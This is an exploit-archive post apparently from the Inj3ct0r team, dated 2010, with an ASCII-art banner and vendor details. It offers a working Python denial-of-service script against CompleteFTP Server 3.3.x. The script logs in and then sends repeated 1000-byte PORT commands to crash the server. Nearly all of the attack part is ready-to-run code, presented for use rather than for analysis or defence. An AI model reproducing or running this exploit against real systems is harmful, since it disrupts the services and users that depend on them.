completeftp33x-dos.txt
Posted on 22 May 2010
------------------------------------------------------------------------ CompleteFTP Server v 3.3.x "PORT" command Remote DOS exploit ------------------------------------------------------------------------ 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ __ __ 1 1 /' __ /'__` / \__ /'__` 0 0 /\_, ___ /\_/\_ ___ ,_/ / _ ___ 1 1 /_/ /' _ ` / /_/_\_<_ /'___ / /`'__ 0 0 / / / / \__/ \_ \_ / 1 1 \_ \_ \_\_ \____/ \____\ \__\ \____/ \_ 0 0 /_//_//_/ \_ /___/ /____/ /__/ /___/ /_/ 1 1 \____/ >> Exploit database separated by exploit 0 0 /___/ type (local, remote, DoS, etc.) 1 1 1 0 [+] Site : Inj3ct0r.com 0 1 [+] Support e-mail : submit[at]inj3ct0r.com 1 0 0 1 ######################################## 1 0 I'm eidelweiss member from Inj3ct0r Team 1 1 ######################################## 0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 Vendor: www.enterprisedt.com download: http://www.enterprisedt.com/products/completeftp/download/CompleteFTPSetup.exe Credit and Thanks: all friends & all Hacker`s Tested On: Windows XP (SP2 & SP3) #!/usr/bin/python import socket print '---------------------------------------------------------------------' print ' CompleteFTP Server v 3.3.x "PORT" command Remote Denial of Service' print ' author: eidelweiss' print ' mail: eidelweiss@cyberservices.com' print '---------------------------------------------------------------------' buffer = "A" * 1000 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect(("127.0.0.1",21)) s.send('USER %s ' % "test") for i in range(1,69): s.send('PORT %s ' % buffer) print "Sending request n. " + str(i)